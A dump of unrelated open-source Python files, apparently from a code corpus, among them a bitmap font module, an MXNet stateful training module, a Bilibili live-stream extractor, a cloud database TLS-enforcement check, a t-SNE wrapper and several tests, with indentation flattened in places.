b'\xff\xff\x00\x00\xff\xff\xff\x00\x00\xff\xff\xff\x00\x00\xff\xff'\
b'\xff\x00\x00\xfc\x00\x00\x00\x01\xfc\x00\x00\x00\x01\xf8\x00\x00'\
b'\x00\x01\xf8\x00\x00\x00\x01\xf8\x00\x00\x00\x01\xf8\x00\x00\x00'\
b'\x03\xf8\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00\x00\x03'\
b'\xf0\x7f\x00\x00\x03\xf3\xff\xc0\x00\x07\xf7\xff\xf0\x00\x07\xff'\
b'\xff\xf8\x00\x07\xff\xff\xfc\x00\x07\xff\xff\xfe\x00\x07\xfe\x03'\
b'\xff\x00\x0f\xf8\x00\xff\x00\x0f\xf0\x00\x7f\x80\x0f\xe0\x00\x3f'\
b'\x80\x01\xc0\x00\x1f\x80\x00\x00\x00\x1f\xc0\x00\x00\x00\x0f\xc0'\
b'\x00\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00'\
b'\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00'\
b'\x00\x0f\xc0\x1f\x80\x00\x1f\x80\x1f\x80\x00\x1f\x80\x1f\xc0\x00'\
b'\x1f\x80\x0f\xc0\x00\x3f\x00\x0f\xe0\x00\x7f\x00\x07\xf0\x00\xfe'\
b'\x00\x07\xfc\x03\xfe\x00\x03\xff\xff\xfc\x00\x01\xff\xff\xf8\x00'\
b'\x00\xff\xff\xf0\x00\x00\x7f\xff\xe0\x00\x00\x1f\xff\x80\x00\x00'\
b'\x07\xfc\x00\x00\x25\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x00\x00'\
b'\x00\x0f\xff\xc0\x00\x00\x3f\xff\xf0\x00\x00\x7f\xff\xf8\x00\x00'\
b'\xff\xff\xfc\x00\x01\xff\xff\xfe\x00\x03\xff\x03\xfe\x00\x03\xf8'\
b'\x00\xff\x00\x07\xf0\x00\x7f\x00\x07\xf0\x00\x3f\x00\x0f\xe0\x00'\
b'\x3f\x80\x0f\xc0\x00\x1f\x80\x0f\xc0\x00\x00\x00\x1f\x80\x00\x00'\
b'\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00'\
b'\x1f\x00\xff\x00\x00\x3f\x07\xff\xc0\x00\x3f\x0f\xff\xf0\x00\x3f'\
b'\x3f\xff\xf8\x00\x3f\x7f\xff\xfc\x00\x3f\x7f\xff\xfe\x00\x3f\xfe'\
b'\x03\xff\x00\x3f\xf0\x00\xff\x00\x3f\xe0\x00\x7f\x80\x3f\xc0\x00'\
b'\x3f\x80\x3f\x80\x00\x1f\x80\x3f\x80\x00\x1f\xc0\x3f\x00\x00\x0f'\
b'\xc0\x3f\x00\x00\x0f\xc0\x3f\x00\x00\x0f\xc0\x3f\x00\x00\x0f\xc0'\
b'\x1f\x00\x00\x0f\xc0\x1f\x00\x00\x0f\xc0\x1f\x00\x00\x0f\xc0\x1f'\
b'\x80\x00\x1f\xc0\x1f\x80\x00\x1f\x80\x0f\xc0\x00\x1f\x80\x0f\xc0'\
b'\x00\x3f\x80\x07\xe0\x00\x7f\x00\x07\xf8\x00\xff\x00\x03\xfe\x03'\
b'\xfe\x00\x01\xff\xff\xfc\x00\x01\xff\xff\xfc\x00\x00\x7f\xff\xf8'\
b'\x00\x00\x3f\xff\xe0\x00\x00\x0f\xff\xc0\x00\x00\x01\xfe\x00\x00'\
b'\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\xff\xff\xff'\
b'\xc0\x1f\xff\xff\xff\xc0\x1f\xff\xff\xff\xc0\x1f\xff\xff\xff\xc0'\
b'\x1f\xff\xff\xff\xc0\x1f\xff\xff\xff\x80\x00\x00\x00\x0f\x80\x00'\
b'\x00\x00\x1f\x00\x00\x00\x00\x3e\x00\x00\x00\x00\x7c\x00\x00\x00'\
b'\x00\xfc\x00\x00\x00\x01\xf8\x00\x00\x00\x01\xf0\x00\x00\x00\x03'\
b'\xf0\x00\x00\x00\x07\xe0\x00\x00\x00\x07\xc0\x00\x00\x00\x0f\xc0'\
b'\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x3f\x00\x00'\
b'\x00\x00\x3f\x00\x00\x00\x00\x7e\x00\x00\x00\x00\x7e\x00\x00\x00'\
b'\x00\xfc\x00\x00\x00\x00\xfc\x00\x00\x00\x01\xf8\x00\x00\x00\x01'\
b'\xf8\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0\x00\x00\x00\x03\xf0'\
b'\x00\x00\x00\x07\xe0\x00\x00\x00\x07\xe0\x00\x00\x00\x07\xe0\x00'\
b'\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00\x00\x0f\xc0\x00\x00'\
b'\x00\x0f\xc0\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00'\
b'\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x3f'\
b'\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x3f\x00'\
b'\x00\x00\x00\x3f\x00\x00\x00\x00\x00\x00\x00\x00\x25\x00\x00\x00'\
b'\x00\x00\x00\x00\x03\xfe\x00\x00\x00\x1f\xff\x80\x00\x00\x3f\xff'\
b'\xe0\x00\x00\x7f\xff\xf0\x00\x00\xff\xff\xf8\x00\x01\xff\xff\xfc'\
b'\x00\x03\xfe\x03\xfe\x00\x03\xf8\x00\xfe\x00\x03\xf0\x00\x7e\x00'\
b'\x07\xf0\x00\x7f\x00\x07\xe0\x00\x3f\x00\x07\xe0\x00\x3f\x00\x07'\
b'\xe0\x00\x3f\x00\x07\xe0\x00\x3f\x00\x07\xe0\x00\x3f\x00\x07\xf0'\
b'\x00\x7f\x00\x03\xf0\x00\x7e\x00\x03\xf8\x00\xfe\x00\x01\xfe\x03'\
b'\xfc\x00\x00\xff\xff\xf8\x00\x00\x7f\xff\xf0\x00\x00\x1f\xff\xc0'\
b'\x00\x00\x3f\xff\xe0\x00\x00\xff\xff\xf8\x00\x01\xff\xff\xfc\x00'\
b'\x03\xfe\x03\xfe\x00\x07\xf8\x00\xff\x00\x07\xe0\x00\x7f\x00\x0f'\
b'\xe0\x00\x3f\x80\x0f\xc0\x00\x1f\x80\x1f\xc0\x00\x1f\xc0\x1f\x80'\
b'\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00'\
b'\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\xc0\x00\x1f'\
b'\xc0\x0f\xc0\x00\x1f\x80\x0f\xc0\x00\x3f\x80\x0f\xe0\x00\x3f\x80'\
b'\x07\xf8\x00\xff\x00\x07\xfe\x03\xff\x00\x03\xff\xff\xfe\x00\x01'\
b'\xff\xff\xfc\x00\x00\xff\xff\xf8\x00\x00\x7f\xff\xf0\x00\x00\x1f'\
b'\xff\xc0\x00\x00\x03\xfe\x00\x00\x25\x00\x00\x00\x00\x00\x00\x00'\
b'\x03\xfc\x00\x00\x00\x1f\xff\x00\x00\x00\x7f\xff\xc0\x00\x00\xff'\
b'\xff\xf0\x00\x01\xff\xff\xf8\x00\x03\xff\xff\xfc\x00\x03\xfe\x03'\
b'\xfc\x00\x07\xf8\x00\xfe\x00\x0f\xf0\x00\x7e\x00\x0f\xe0\x00\x3f'\
b'\x00\x0f\xe0\x00\x1f\x00\x1f\xc0\x00\x1f\x80\x1f\xc0\x00\x0f\x80'\
b'\x1f\x80\x00\x0f\x80\x1f\x80\x00\x0f\x80\x1f\x80\x00\x0f\xc0\x1f'\
b'\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80\x00\x0f\xc0\x1f\x80'\
b'\x00\x0f\xc0\x1f\xc0\x00\x1f\xc0\x0f\xc0\x00\x1f\xc0\x0f\xe0\x00'\
b'\x3f\xc0\x0f\xf0\x00\x7f\xc0\x07\xf8\x00\xff\xc0\x07\xfe\x03\xff'\
b'\xc0\x03\xff\xff\xff\xc0\x01\xff\xff\xef\xc0\x00\xff\xff\xcf\xc0'\
b'\x00\x7f\xff\x0f\xc0\x00\x1f\xfe\x0f\xc0\x00\x07\xf0\x0f\xc0\x00'\
b'\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00\x00\x1f\x80\x00\x00'\
b'\x00\x1f\x80\x00\x00\x00\x3f\x00\x0f\xc0\x00\x3f\x00\x0f\xc0\x00'\
b'\x3f\x00\x0f\xe0\x00\x7e\x00\x07\xe0\x00\xfe\x00\x07\xf0\x01\xfc'\
b'\x00\x03\xfc\x07\xfc\x00\x03\xff\xff\xf8\x00\x01\xff\xff\xf0\x00'\
b'\x00\xff\xff\xe0\x00\x00\x7f\xff\xc0\x00\x00\x1f\xff\x00\x00\x00'\
b'\x07\xf8\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x03\xf0\x00\x03\xf0\x00\x03\xf0\x00\x03\xf0\x00\x03\xf0\x00\x03'\
b'\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x03\xf0\x00\x03\xf0\x00\x03\xf0\x00'\
b'\x03\xf0\x00\x03\xf0\x00\x03\xf0\x00\x00\x00\x00'
_index =\
b'\x00\x00\xfc\x00\xf8\x01\xf4\x02\xf0\x03\xec\x04\xe8\x05\xe4\x06'\
b'\xe0\x07\xdc\x08\xd8\x09\xd4\x0a\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x6c\x0b'
_mvfont = memoryview(_font)
_mvi = memoryview(_index)
ifb = lambda l : l[0] | (l[1] << 8)
def get_ch(ch):
oc = ord(ch)
ioff = 2 * (oc - 48 + 1) if oc >= 48 and oc <= 63 else 0
doff = ifb(_mvi[ioff : ])
width = ifb(_mvfont[doff : ])
next_offs = doff + 2 + ((width - 1)//8 + 1) * 50
return _mvfont[doff + 2:next_offs], 50, width
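
if __name__ == "__main__":
    # Minimal sketch (not part of the generated font file): dump one glyph as
    # ASCII art so the packed horizontal-mapped bitmap layout is visible.
    glyph, rows, width = get_ch("7")
    bytes_per_row = (width - 1) // 8 + 1
    for r in range(rows):
        row = glyph[r * bytes_per_row:(r + 1) * bytes_per_row]
        bits = "".join("{:08b}".format(b) for b in row)[:width]
        print(bits.replace("0", " ").replace("1", "#"))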
|
example/rnn/word_lm/module.py | Vikas-kum/incubator-mxnet | 228 | 12610958 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
import logging
class CustomStatefulModule():
"""CustomStatefulModule is a module that takes a custom loss symbol and state symbols.
    The custom loss is typically constructed with `mx.sym.make_loss` or `mx.sym.MakeLoss`.
The states listed in `state_names` will be carried between iterations.
Parameters
----------
loss : Symbol
The custom loss symbol
states: list of Symbol
The symbols of next states
state_names : list of str
states are similar to data and label, but not provided by data iterator.
Instead they are initialized to `initial_states` and can be carried between iterations.
data_names : list of str
Defaults to `('data')` for a typical model used in image classification.
label_names : list of str
Defaults to `('softmax_label')` for a typical model used in image
classification.
logger : Logger
Defaults to `logging`.
context : Context or list of Context
Defaults to ``mx.cpu()``.
initial_states: float or list of NDArray
Defaults to 0.0.
"""
def __init__(self, loss, states, state_names, data_names=('data',), label_names=('label',),
context=mx.cpu(), initial_states=0.0, **kwargs):
if isinstance(states, mx.symbol.Symbol):
states = [states]
self._net = mx.sym.Group(states + [loss])
self._next_states = initial_states
self._module = mx.module.Module(self._net, data_names=data_names, label_names=label_names,
context=context, state_names=state_names, **kwargs)
def backward(self, out_grads=None):
"""Backward computation.
"""
self._module.backward(out_grads=out_grads)
def init_params(self, initializer=mx.init.Uniform(0.01), **kwargs):
"""Initializes the parameters and auxiliary states.
"""
self._module.init_params(initializer=initializer, **kwargs)
def init_optimizer(self, **kwargs):
"""Installs and initializes optimizers, as well as initialize kvstore for
distributed training.
"""
self._module.init_optimizer(**kwargs)
def bind(self, data_shapes, **kwargs):
"""Binds the symbols to construct executors. This is necessary before one
can perform computation with the module.
"""
self._module.bind(data_shapes, **kwargs)
def forward(self, data_batch, is_train=None, carry_state=True):
"""Forward computation. States from previous forward computation are carried
to the current iteration if `carry_state` is set to `True`.
"""
# propagate states from the previous iteration
if carry_state:
if isinstance(self._next_states, (int, float)):
self._module.set_states(value=self._next_states)
else:
self._module.set_states(states=self._next_states)
self._module.forward(data_batch, is_train=is_train)
outputs = self._module.get_outputs(merge_multi_context=False)
self._next_states = outputs[:-1]
def update(self, max_norm=None):
"""Updates parameters according to the installed optimizer and the gradients computed
in the previous forward-backward batch. Gradients are clipped by their global norm
if `max_norm` is set.
Parameters
----------
max_norm: float, optional
            If set, gradients are rescaled so that their global norm does not exceed this value.
"""
if max_norm is not None:
self._clip_by_global_norm(max_norm)
self._module.update()
def _clip_by_global_norm(self, max_norm):
"""Clips gradient norm.
The norm is computed over all gradients together, as if they were
concatenated into a single vector. Gradients are modified in-place.
The method is first used in
`[ICML2013] On the difficulty of training recurrent neural networks`
Parameters
----------
max_norm : float or int
The maximum clipping threshold of the gradient norm.
Returns
-------
norm_val : float
The computed norm of the gradients.
"""
assert self._module.binded and self._module.params_initialized \
and self._module.optimizer_initialized
grad_array = []
for grad in self._module._exec_group.grad_arrays:
grad_array += grad
return mx.gluon.utils.clip_global_norm(grad_array, max_norm)
def get_loss(self):
"""Gets the output loss of the previous forward computation.
"""
return self._module.get_outputs(merge_multi_context=False)[-1]
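
def _example_usage():
    """Minimal sketch (assumption-heavy) of how CustomStatefulModule is driven.

    The toy symbols, shapes and state update below are invented purely to show
    the call sequence (bind -> init_params -> init_optimizer -> forward/backward
    -> update); they are not the word-language-model network used elsewhere in
    this example.
    """
    data = mx.sym.Variable('data')
    label = mx.sym.Variable('label')
    prev_state = mx.sym.Variable('prev_state')
    pred = mx.sym.FullyConnected(data=data, num_hidden=1, name='fc')
    loss = mx.sym.make_loss(mx.sym.mean(mx.sym.square(pred - label)))
    # Toy "state": running per-sample mean of the inputs, carried across batches.
    next_state = prev_state + mx.sym.mean(data, axis=1, keepdims=True)

    module = CustomStatefulModule(loss, [next_state], state_names=['prev_state'],
                                  data_names=('data',), label_names=('label',))
    module.bind(data_shapes=[('data', (4, 8))], label_shapes=[('label', (4, 1))])
    module.init_params()
    module.init_optimizer(optimizer='sgd', optimizer_params={'learning_rate': 0.01})

    batch = mx.io.DataBatch(data=[mx.nd.random.uniform(shape=(4, 8))],
                            label=[mx.nd.zeros((4, 1))])
    for _ in range(3):
        module.forward(batch, is_train=True)
        module.backward()
        module.update(max_norm=5.0)
        logging.info('loss: %s', module.get_loss()[0].asscalar())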
|
ykdl/extractors/bilibili/live.py | SeaHOH/ykdl | 136 | 12610959 | # -*- coding: utf-8 -*-
from .._common import *
class BiliLive(Extractor):
name = 'Bilibili live (哔哩哔哩 直播)'
profile_2_id = {
'4K': '4K',
        '原画': 'OG',  # original quality
        '蓝光': 'BD',  # blu-ray
        '超清': 'TD',  # super HD
        '高清': 'HD',  # high definition
        '流畅': 'SD'   # smooth (lowest)
}
def prepare(self):
info = MediaInfo(self.name, True)
ID = match1(self.url, '/(\d+)')
api1_data = get_response(
'https://api.live.bilibili.com/room/v1/Room/room_init',
params={'id': ID}).json()
if api1_data['code'] == 0:
self.vid = api1_data['data']['room_id']
else:
self.logger.debug('Get room ID from API failed: %s', api1_data['msg'])
self.vid = ID
api2_data = get_response(
'https://api.live.bilibili.com/room/v1/Room/get_info',
params={'room_id': self.vid}).json()
assert api2_data['code'] == 0, api2_data['msg']
api2_data = api2_data['data']
        assert api2_data['live_status'] == 1, '主播正在觅食......'  # message: "the streamer is not live right now"
info.title = title = api2_data['title']
api3_data = get_response(
'https://api.live.bilibili.com/live_user/v1/UserInfo/get_anchor_in_room',
params={'roomid': self.vid}).json()
if api3_data['code'] == 0:
info.artist = artist = api3_data['data']['info']['uname']
info.title = '{title} - {artist}'.format(**vars())
def get_live_info(qn=1):
data = get_response(
'https://api.live.bilibili.com/xlive/web-room/v1/playUrl/playUrl',
params={
'https_url_req': 1,
'cid': self.vid,
'platform': 'web',
'qn': qn,
'ptype': 16
}).json()
assert data['code'] == 0, data['msg']
data = data['data']
urls = [random.choice(data['durl'])['url']]
qlt = data['current_qn']
aqlts = {x['qn']: x['desc'] for x in data['quality_description']}
size = float('inf')
ext = 'flv'
prf = aqlts[qlt]
st = self.profile_2_id[prf]
if urls:
info.streams[st] = {
'container': ext,
'video_profile': prf,
'src' : urls,
'size': size
}
if qn == 1:
del aqlts[qlt]
for aqlt in aqlts:
get_live_info(aqlt)
get_live_info()
return info
site = BiliLive()
|
terrascript/spotinst/r.py | hugovk/python-terrascript | 507 | 12610971 | # terrascript/spotinst/r.py
|
cms/management/commands/cms.py | devyntk/django-cms | 5,659 | 12610973 | <reponame>devyntk/django-cms<gh_stars>1000+
from collections import OrderedDict
import cms
from .subcommands.base import SubcommandsCommand
from .subcommands.check import CheckInstallation
from .subcommands.copy import CopyCommand
from .subcommands.delete_orphaned_plugins import DeleteOrphanedPluginsCommand
from .subcommands.list import ListCommand
from .subcommands.publisher_publish import PublishCommand
from .subcommands.tree import FixTreeCommand
from .subcommands.uninstall import UninstallCommand
class Command(SubcommandsCommand):
command_name = 'cms'
subcommands = OrderedDict((
('check', CheckInstallation),
('copy', CopyCommand),
('delete-orphaned-plugins', DeleteOrphanedPluginsCommand),
('fix-tree', FixTreeCommand),
('list', ListCommand),
('publisher-publish', PublishCommand),
('uninstall', UninstallCommand),
))
missing_args_message = 'one of the available sub commands must be provided'
subcommand_dest = 'cmd'
def get_version(self):
return cms.__version__
def add_arguments(self, parser):
parser.add_argument('--version', action='version', version=self.get_version())
super().add_arguments(parser)
|
cloudmarker/events/rdbmsenforcetlsevent.py | TinLe/cloudmarker | 208 | 12610980 | """RDBMS Enforce TLS/SSL Event.
This module defines the :class:`RDBMSEnforceTLSEvent` class that
identifies RDBMS servers which have TLS/SSL connection enforcement
disabled. This plugin works on the properties found in the ``com``
bucket of ``rdbms`` records.
"""
import logging
from cloudmarker import util
_log = logging.getLogger(__name__)
class RDBMSEnforceTLSEvent:
"""Az RDBMS TLS/SSL enforcement event plugin."""
def __init__(self):
"""Create an instance of :class:`RDBMSEnforceTLSEvent`."""
def eval(self, record):
"""Evaluate RDBMS servers for TLS connection enforcement.
Arguments:
record (dict): An RDBMS record.
Yields:
dict: An event record representing an RDBMS where TLS
connection enforcement is disabled
"""
com = record.get('com', {})
if com is None:
return
if com.get('record_type') != 'rdbms':
return
ext = record.get('ext', {})
if ext is None:
return
# True, None, missing key or any other value will not
        # generate an event. An event will be generated only if
# the value of `tls_enforced` is False.
if com.get('tls_enforced') is False:
yield from _get_rdbms_tls_enforcement_event(
com, ext)
def done(self):
"""Perform cleanup work.
Currently, this method does nothing. This may change in future.
"""
def _get_rdbms_tls_enforcement_event(com, ext):
"""Generate event for TLS enforcement disabled.
Arguments:
com (dict): RDBMS record `com` bucket
ext (dict): RDBMS record `ext` bucket
Returns:
dict: An event record representing RDBMS with SSL
connection enforcement disabled
"""
friendly_cloud_type = util.friendly_string(com.get('cloud_type'))
friendly_rdbms_type = util.friendly_string(ext.get('record_type'))
reference = com.get('reference')
description = (
'{} {} {} has TLS/SSL enforcement disabled.'
.format(friendly_cloud_type, friendly_rdbms_type, reference)
)
recommendation = (
'Check {} {} {} and enable TLS/SSL enforcement.'
.format(friendly_cloud_type, friendly_rdbms_type, reference)
)
event_record = {
# Preserve the extended properties from the RDBMS
# record because they provide useful context to
# locate the RDBMS that led to the event.
'ext': util.merge_dicts(ext, {
'record_type': 'rdbms_enforce_tls_event'
}),
'com': {
'cloud_type': com.get('cloud_type'),
'record_type': 'rdbms_enforce_tls_event',
'reference': reference,
'description': description,
'recommendation': recommendation,
}
}
_log.info('Generating rdbms_enforce_tls_event; %r', event_record)
yield event_record
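
def _example_run():
    """Minimal sketch (not part of cloudmarker): run the plugin on one record.

    The record below is hand-made for illustration; field values such as the
    cloud type and reference are assumptions, not real cloud data.
    """
    plugin = RDBMSEnforceTLSEvent()
    record = {
        'com': {
            'record_type': 'rdbms',
            'cloud_type': 'azure',
            'reference': 'example-server',
            'tls_enforced': False,
        },
        'ext': {
            'record_type': 'mysql_server',
        },
    }
    for event in plugin.eval(record):
        _log.info('Example event description: %s', event['com']['description'])
    plugin.done()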
|
tests/test_all_notebooks.py | maulanailyasy/miepythonscot | 104 | 12610987 | <reponame>maulanailyasy/miepythonscot<gh_stars>100-1000
# pylint: disable=invalid-name
"""
This file is intended to be the target of a pytest run.
It will recursively find all .ipynb files in the current directory, ignoring
directories that start with . and any files matching patterns found in the file
.testignore
List patterns to skip in .testignore file:
under_construction/*
Sample invocations of pytest which make the output nicely readable:
pytest --verbose --durations=5 test_all_notebooks.py
If you install pytest-xdist you can run tests in parallel with
pytest --verbose --durations=5 -n 4 test_all_notebooks.py
Original version is licensed under GPL 3.0 so this one is too.
The original can be located at
https://github.com/alchemyst/Dynamics-and-Control/test_all_notebooks.py
"""
import os.path
import pathlib
import pytest
import nbformat
import nbconvert.preprocessors
# Default search path is the current directory
# searchpath = pathlib.Path('.')
searchpath = pathlib.Path('./docs/') # all notebooks are in here
# Read patterns from .testignore file
ignores = ''
if os.path.exists('.testignore'):
ignores = [line.strip() for line in open('.testignore') if line.strip()]
# Ignore hidden folders (startswith('.')) and files matching ignore patterns
notebooks = [notebook for notebook in searchpath.glob('**/*.ipynb')
if not (any(parent.startswith('.')
for parent in notebook.parent.parts)
or any(notebook.match(pattern)
for pattern in ignores))]
notebooks.sort()
ids = [n.as_posix() for n in notebooks]
for n in notebooks:
print(n)
@pytest.mark.notebooks
@pytest.mark.parametrize("notebook", notebooks, ids=ids)
def test_run_notebook(notebook):
"""Read and execute notebook.
The method here is directly from the nbconvert docs
Note that there is no error handling in this file as any errors will be
caught by pytest
"""
with open(notebook) as f:
nb = nbformat.read(f, as_version=4)
ep = nbconvert.preprocessors.ExecutePreprocessor(timeout=600)
ep.preprocess(nb, {'metadata': {'path': notebook.parent}})
|
test/cts/tool/CTSConverter/src/nn/specs/V1_1/pad_float_1_relaxed.mod.py | zhaoming0/webml-polyfill | 255 | 12611011 | <reponame>zhaoming0/webml-polyfill<gh_stars>100-1000
#
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# model
model = Model()
i1 = Input("op1", "TENSOR_FLOAT32", "{1, 2, 3, 1}")
i2 = Parameter("op2", "TENSOR_INT32", "{4, 2}", [0, 0, 0, 2, 1, 3, 0, 0])
i3 = Output("op3", "TENSOR_FLOAT32", "{1, 4, 7, 1}")
model = model.Operation("PAD", i1, i2).To(i3)
model = model.RelaxedExecution(True)
# Example 1. Input in operand 0,
input0 = {i1: # input 0
[1.0, 2.0, 3.0,
4.0, 5.0, 6.0]}
output0 = {i3: # output 0
[0, 1, 2, 3, 0, 0, 0, 0, 4, 5, 6, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]}
# Instantiate an example
Example((input0, output0))
|
scratchpad/save_subtitles.py | Outflier/PyAV | 965 | 12611015 | """
As you can see, the subtitle API needs some work.
"""
import os
import sys
import pprint
from PIL import Image
from av import open
if not os.path.exists('subtitles'):
os.makedirs('subtitles')
video = open(sys.argv[1])
streams = [s for s in video.streams if s.type == b'subtitle']
if not streams:
print('no subtitles')
exit(1)
print(streams)
count = 0
for pi, packet in enumerate(video.demux([streams[0]])):
print('packet', pi)
for si, subtitle in enumerate(packet.decode()):
print('\tsubtitle', si, subtitle)
for ri, rect in enumerate(subtitle.rects):
if rect.type == 'ass':
print('\t\tass: ', rect, rect.ass.rstrip('\n'))
if rect.type == 'text':
print('\t\ttext: ', rect, rect.text.rstrip('\n'))
if rect.type == 'bitmap':
print('\t\tbitmap: ', rect, rect.width, rect.height, rect.pict_buffers)
buffers = [b for b in rect.pict_buffers if b is not None]
if buffers:
imgs = [
Image.frombuffer('L', (rect.width, rect.height), buffer, "raw", "L", 0, 1)
for buffer in buffers
]
if len(imgs) == 1:
img = imgs[0]
elif len(imgs) == 2:
img = Image.merge('LA', imgs)
else:
img = Image.merge('RGBA', imgs)
img.save('subtitles/%04d.png' % count)
count += 1
if count > 10:
pass
# exit()
|
fastapi_sqlalchemy/exceptions.py | cancan101/fastapi-sqlalchemy | 419 | 12611017 | <filename>fastapi_sqlalchemy/exceptions.py
class MissingSessionError(Exception):
"""Excetion raised for when the user tries to access a database session before it is created."""
def __init__(self):
msg = """
No session found! Either you are not currently in a request context,
or you need to manually create a session context by using a `db` instance as
a context manager e.g.:
with db():
db.session.query(User).all()
"""
super().__init__(msg)
class SessionNotInitialisedError(Exception):
"""Exception raised when the user creates a new DB session without first initialising it."""
def __init__(self):
msg = """
Session not initialised! Ensure that DBSessionMiddleware has been initialised before
attempting database access.
"""
super().__init__(msg)
|
tsne/_bh_sne.py | WiscEvan/tsne | 404 | 12611027 | import numpy as np
import scipy.linalg as la
from bh_sne import BH_SNE
def bh_sne(
data,
pca_d=None,
d=2,
perplexity=30.0,
theta=0.5,
random_state=None,
copy_data=False,
verbose=False,
):
"""
Run Barnes-Hut T-SNE on _data_.
@param data The data.
@param pca_d The dimensionality of data is reduced via PCA
to this dimensionality.
@param d The embedding dimensionality. Must be fixed to
2.
@param perplexity The perplexity controls the effective number of
neighbors.
@param theta If set to 0, exact t-SNE is run, which takes
                          very long for datasets with more than 5000 samples.
@param random_state A numpy RandomState object; if None, use
the numpy.random singleton. Init the RandomState
with a fixed seed to obtain consistent results
from run to run.
@param copy_data Copy the data to prevent it from being modified
by the C code
@param verbose Verbose output from the training process
"""
N, _ = data.shape
if pca_d is None:
if copy_data:
X = np.copy(data)
else:
X = data
else:
# do PCA
data -= data.mean(axis=0)
# working with covariance + (svd on cov.) is
# much faster than svd on data directly.
cov = np.dot(data.T, data) / N
u, s, v = la.svd(cov, full_matrices=False)
u = u[:, 0:pca_d]
X = np.dot(data, u)
if random_state is None:
seed = np.random.randint(2 ** 32 - 1)
else:
seed = random_state.randint(2 ** 32 - 1)
bh_tsne = BH_SNE()
Y = bh_tsne.run(X, N, X.shape[1], d, perplexity, theta, seed, verbose)
return Y
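# Illustrative usage sketch added for clarity (an assumption, not part of the
# original module): embed a small random dataset into 2-D. This assumes the
# compiled `bh_sne` extension is importable and accepts float64 input.
if __name__ == "__main__":
    rng = np.random.RandomState(0)
    data = rng.rand(500, 50).astype("float64")
    # Reduce to 20 dims with PCA first, then embed with the default
    # perplexity/theta; pass the RandomState for a reproducible seed.
    embedding = bh_sne(data, pca_d=20, random_state=rng, verbose=True)
    print(embedding.shape)  # expected: (500, 2)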
|
AppPkg/Applications/Python/Python-2.7.2/Lib/json/tests/test_indent.py | CEOALT1/RefindPlusUDK | 2,757 | 12611029 | import textwrap
from StringIO import StringIO
from json.tests import PyTest, CTest
class TestIndent(object):
def test_indent(self):
h = [['blorpie'], ['whoops'], [], 'd-shtaeou', 'd-nthiouh', 'i-vhbjkhnth',
{'nifty': 87}, {'field': 'yes', 'morefield': False} ]
expect = textwrap.dedent("""\
[
[
"blorpie"
],
[
"whoops"
],
[],
"d-shtaeou",
"d-nthiouh",
"i-vhbjkhnth",
{
"nifty": 87
},
{
"field": "yes",
"morefield": false
}
]""")
d1 = self.dumps(h)
d2 = self.dumps(h, indent=2, sort_keys=True, separators=(',', ': '))
h1 = self.loads(d1)
h2 = self.loads(d2)
self.assertEqual(h1, h)
self.assertEqual(h2, h)
self.assertEqual(d2, expect)
def test_indent0(self):
h = {3: 1}
def check(indent, expected):
d1 = self.dumps(h, indent=indent)
self.assertEqual(d1, expected)
sio = StringIO()
self.json.dump(h, sio, indent=indent)
self.assertEqual(sio.getvalue(), expected)
# indent=0 should emit newlines
check(0, '{\n"3": 1\n}')
# indent=None is more compact
check(None, '{"3": 1}')
class TestPyIndent(TestIndent, PyTest): pass
class TestCIndent(TestIndent, CTest): pass
|
torchrecipes/audio/source_separation/loss/utils.py | facebookresearch/recipes | 161 | 12611036 | <filename>torchrecipes/audio/source_separation/loss/utils.py
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the BSD-style license found in the
